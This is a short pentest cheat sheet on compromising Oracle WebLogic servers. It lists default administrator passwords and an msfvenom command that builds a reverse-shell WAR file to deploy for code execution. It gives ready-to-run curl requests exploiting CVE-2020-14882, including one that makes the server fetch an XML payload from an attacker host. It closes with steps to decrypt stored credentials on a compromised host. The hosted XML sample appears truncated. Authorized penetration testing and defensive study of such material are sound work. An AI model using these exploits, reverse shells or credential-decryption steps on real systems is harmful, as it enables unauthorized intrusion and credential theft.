WebLogic pentest notes

Guillaume Quéré

Default passwords

Version Account Default password
<= 10 weblogic weblogic
>= 11 weblogic weblogic1 or Welcome1 or welcome1

RCE from admin account

Generate a WAR file using msf.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.xx LPORT=1234 -f war > peace.war

Then deploy on the web interface. First enter the deployment menu, second lock the configuration for editing and then click install. This gives the option to upload a new RAR and install it on the server, triggering the payload: lock and edit

Unauthenticated RCE CVE-2020-14882 (fall 2020)

Official Advisory

Affected versions:,,,,

There are loads of other RCEs spanning 2017-2020 but this one is so easy and powerful it kinda renders all the other exploits obsolete.

If Tangosol is present on the target (versions >=12 usually) then direct remote code execution is achieved:

curl -X POST 'http://target:7001/console/css/%252e%252e%252fconsole.portal'
    --data '_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec(%27touch%20/tmp/rce%27);")'

Otherwise an additional malicious webserver hosting a XML paylod is needed, but RCE is achieved nonetheless.

Hosted XML file wl.xml:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
curl -X POST 'http://target:7001/console/css/%252e%252e%252fconsole.portal'
    --data '_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://xx.xx.xx.xx/wl.xml%22)'

Of course, the WebLogic server needs to have network visibility on the hosted payload.

Decrypting passwords


On the compromised host, recover these two files:

Decrypt using this python script.


Grab the domain path from the wl-domains folder

wls:/offline> domain = "..."
wls:/offline> service = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domain)
wls:/offline> enc = weblogic.security.internal.encryption.ClearOrEncryptedService(service)
wls:/offline> enc.decrypt('{AES}...')